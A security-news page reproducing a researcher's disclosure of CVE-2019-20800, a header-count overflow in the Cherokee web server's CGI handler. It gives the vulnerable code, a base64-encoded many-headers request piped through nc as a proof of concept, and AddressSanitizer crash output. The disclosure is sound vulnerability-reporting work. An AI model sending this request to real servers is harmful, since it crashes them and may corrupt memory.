Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2019-20800: CGI Handler too many headers · Issue #1224 · cherokee/webserver

In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many “Host: 127.0.0.1” headers.

CVE
Open in Source
#web#ubuntu#linux#git

struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char *envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to

increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array.

handler_cgi.c:

310     cgi->envp[cgi->envp_last] = entry;
311     cgi->envp_last++;

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDQyOTQ5NjcyOTUuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
    #0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
    #1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
    #2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
    #3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
    #4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
    #5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
    #6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
    #0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

==10864==ABORTING

Setup:

  • Ubuntu 18.04 64 bit

  • source code from github, commit 9a75e65

  • build command:

ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
  • files in webroot mkdir /var/www/test{1…20}; for i in seq 1 20; do echo test > test$i/test.html; done
  • configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE